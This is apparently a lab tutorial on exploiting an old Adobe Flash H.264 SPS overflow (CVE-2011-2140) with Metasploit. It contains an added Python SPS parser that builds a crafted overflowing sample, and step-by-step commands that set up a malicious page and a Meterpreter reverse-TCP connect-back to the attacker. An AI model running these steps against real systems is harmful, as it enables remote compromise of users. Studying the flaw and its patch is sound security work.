Type : Tutorial
Level : Medium
Attacker O.S : Backtrack 5 R1
Victim O.S : Windows XP SP 3
Vulnerable Application : Adobe Flash Player
Exploit Credits : Alexander Gavrun, Abysssec, Sinn3r
This module exploits a vulnerability in Adobe Flash Player's Flash10u.ocx component. When processing an MP4 file, specifically the H.264 Sequence Parameter Set (SPS), Flash checks whether pic_order_cnt_type is equal to 1; on that path the file supplies the num_ref_frames_in_pic_order_cnt_cycle field, and Flash then copies that many offset_for_ref_frame entries into a fixed-size buffer on the stack without bounding the count, which allows arbitrary remote code execution in the context of the user viewing the page. Numerous reports also indicate that this vulnerability has been exploited in the wild.
Please note that the exploit requires a SWF media player in order to trigger the bug, which currently isn't included in the framework. However, software such as Longtail SWF Player is free for non-commercial use, and is easily obtainable.
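To make the root cause concrete, here is an added example that is not code from the original post or from the Metasploit module: a minimal reader for the H.264 SPS that stops at the field described above. num_ref_frames_in_pic_order_cnt_cycle is an Exp-Golomb ue(v) value that ISO/IEC 14496-10 limits to 0..255, which is why decoders keep a fixed 256-entry offset_for_ref_frame[] array; a parser that trusts the value and copies that many entries overruns that array. The checked parser rejects such an SPS, while the `enforce_limit=False` mode mimics the blind copy so you can see how far past the array a crafted file would write. Assumptions: the input is the SPS RBSP after the NAL header with emulation-prevention bytes already removed, only Baseline/Main/Extended profiles are handled, and the two sample SPS blobs are constructed inline by the example's own encoder.

```python
# Added example (not from the original post or the Metasploit module): parse
# an H.264 SPS up to the field the post describes and flag an out-of-range
# num_ref_frames_in_pic_order_cnt_cycle.  Assumes the RBSP after the NAL
# header, emulation-prevention bytes removed, Baseline/Main/Extended profile.

MAX_REF_FRAMES_IN_POC_CYCLE = 255   # spec limit; decoders size the array to 256
HIGH_PROFILES = {100, 110, 122, 244, 44, 83, 86, 118, 128, 138, 139, 134, 135}


class BitReader:
    """MSB-first bit reader with the Exp-Golomb codes the SPS uses."""

    def __init__(self, data: bytes):
        self.data, self.pos = data, 0

    def read_bits(self, n: int) -> int:
        val = 0
        for _ in range(n):
            byte = self.pos >> 3
            if byte >= len(self.data):
                raise ValueError("SPS truncated")
            val = (val << 1) | ((self.data[byte] >> (7 - (self.pos & 7))) & 1)
            self.pos += 1
        return val

    def read_ue(self) -> int:             # unsigned Exp-Golomb: n zeros, 1, n bits
        zeros = 0
        while self.read_bits(1) == 0:
            zeros += 1
            if zeros > 31:
                raise ValueError("invalid Exp-Golomb code")
        return (1 << zeros) - 1 + self.read_bits(zeros)

    def read_se(self) -> int:             # signed mapping: 0,1,2,3,4 -> 0,1,-1,2,-2
        k = self.read_ue()
        return (k + 1) // 2 if k % 2 else -(k // 2)


def parse_sps(rbsp: bytes, enforce_limit: bool = True) -> dict:
    """Parse an SPS through max_num_ref_frames.  enforce_limit=False mimics
    the blind copy the post describes and returns every entry the file asked for."""
    r, sps = BitReader(rbsp), {}
    sps["profile_idc"] = r.read_bits(8)
    r.read_bits(8)                        # constraint_set flags + reserved bits
    sps["level_idc"] = r.read_bits(8)
    sps["seq_parameter_set_id"] = r.read_ue()
    if sps["profile_idc"] in HIGH_PROFILES:
        raise NotImplementedError("High-profile SPS fields not handled in this example")
    sps["log2_max_frame_num_minus4"] = r.read_ue()
    sps["pic_order_cnt_type"] = r.read_ue()
    if sps["pic_order_cnt_type"] == 0:
        sps["log2_max_pic_order_cnt_lsb_minus4"] = r.read_ue()
    elif sps["pic_order_cnt_type"] == 1:  # the path the post describes
        sps["delta_pic_order_always_zero_flag"] = r.read_bits(1)
        sps["offset_for_non_ref_pic"] = r.read_se()
        sps["offset_for_top_to_bottom_field"] = r.read_se()
        n = r.read_ue()
        sps["num_ref_frames_in_pic_order_cnt_cycle"] = n
        if enforce_limit and n > MAX_REF_FRAMES_IN_POC_CYCLE:
            raise ValueError(f"num_ref_frames_in_pic_order_cnt_cycle={n} > 255")
        sps["offset_for_ref_frame"] = [r.read_se() for _ in range(n)]
    sps["max_num_ref_frames"] = r.read_ue()
    return sps


def check_sps(rbsp: bytes):
    """(accepted, reason) pair, usable as a simple file-level check."""
    try:
        parse_sps(rbsp)
        return True, "ok"
    except ValueError as err:
        return False, str(err)


class BitWriter:
    """Encoder used only to construct the sample SPS blobs below."""

    def __init__(self):
        self.bits = []

    def write_bits(self, val: int, n: int):
        self.bits += [(val >> i) & 1 for i in range(n - 1, -1, -1)]

    def write_ue(self, v: int):
        code = v + 1
        n = code.bit_length() - 1
        self.write_bits(0, n)
        self.write_bits(code, n + 1)

    def write_se(self, v: int):
        self.write_ue(2 * v - 1 if v > 0 else -2 * v)

    def to_bytes(self) -> bytes:
        bits = self.bits + [1] + [0] * ((-len(self.bits) - 1) % 8)  # stop bit + alignment
        return bytes(int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, len(bits), 8))


def build_sps(num_cycle: int) -> bytes:
    """Constructed Baseline SPS with pic_order_cnt_type=1; offsets alternate 1, -1."""
    w = BitWriter()
    w.write_bits(66, 8); w.write_bits(0, 8); w.write_bits(30, 8)  # profile, flags, level
    w.write_ue(0); w.write_ue(0)          # seq_parameter_set_id, log2_max_frame_num_minus4
    w.write_ue(1)                         # pic_order_cnt_type = 1
    w.write_bits(0, 1)                    # delta_pic_order_always_zero_flag
    w.write_se(0); w.write_se(0)          # offset_for_non_ref_pic, top_to_bottom_field
    w.write_ue(num_cycle)                 # num_ref_frames_in_pic_order_cnt_cycle
    for i in range(num_cycle):
        w.write_se(1 if i % 2 == 0 else -1)
    w.write_ue(1)                         # max_num_ref_frames
    return w.to_bytes()


BENIGN_SPS = build_sps(2)                 # constructed: within the 255 limit
CRAFTED_SPS = build_sps(300)              # constructed: 44 entries past a 256-entry array

if __name__ == "__main__":
    print(check_sps(BENIGN_SPS), check_sps(CRAFTED_SPS))
    blind = parse_sps(CRAFTED_SPS, enforce_limit=False)
    print(len(blind["offset_for_ref_frame"]) - 256, "entries would land past the array")
```

The checked parser refuses the crafted SPS at the count itself, before any entry is copied; that ordering is the point of the fix, since validating after the loop is too late. The blind mode is only there to measure the overrun for a given sample.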
1. Vulnerable Adobe Flash Player (download link)
2. Adobe Flash sps Exploit
1. Copy the exploit module into the framework's browser exploit directory (on Backtrack 5 R1 the framework lives under /pentest/exploits/framework):
cp adobe_flash_sps.rb /pentest/exploits/framework/modules/exploits/windows/browser/
2. Run Metasploit with the msfconsole command and select the exploit you added in step 1 (its module path follows from the directory you copied it into: exploit/windows/browser/adobe_flash_sps).
I'm still using Meterpreter reverse_tcp (windows/meterpreter/reverse_tcp) as my favourite payload 😛
3. Use the show options command to view the available options for this exploit and for the payload that you need to configure to perform this attack. In the picture below I configure only the basics needed to make this exploit work.
Information:
set srvhost 192.168.1.5 --> IP address of the attacker machine that will serve the malicious page
set srvport 80 --> port the web server listens on for incoming victim connections
set swf_player_uri http://www.jeroenwijering.com/embed/mediaplayer.swf --> the SWF media player used to trigger the bug (see the module note above)
set uripath flashplayer --> makes the URL friendlier than the random path Metasploit would otherwise generate
set lhost 192.168.1.5 --> IP address of the attacker host that handles the connect-back from the victim
set lport 443 --> port the payload handler listens on for the connect-back from the victim
exploit --> start the web server and the payload handler
Make sure nothing else on the attacker box is already bound to ports 80 and 443, or the server and handler will fail to start.
4. After we run the exploit command, we act as the attacker web server and wait for a connection. The victim reaches it through the address built from the options in step 3 (SRVHOST, SRVPORT 80 and URIPATH), i.e. http://192.168.1.5/flashplayer. The picture below was taken when the victim accessed the URL.
5. Yep, we're already interacting with the victim, and as seen in step 4 the exploit migrates out of the browser into a notepad.exe process. Use sessions -i 1 to interact with active session number 1 (to view the list of active sessions, run the sessions -l command).
Pwn3D!! we're in 🙂
1. Update Adobe Flash Player to the latest version (this bug is CVE-2011-2140, fixed in Adobe security bulletin APSB11-21).
2. Do not open a URL sent by someone you don't know (or even by someone you do know) if you don't know what it points to.
Hope you enjoyed 🙂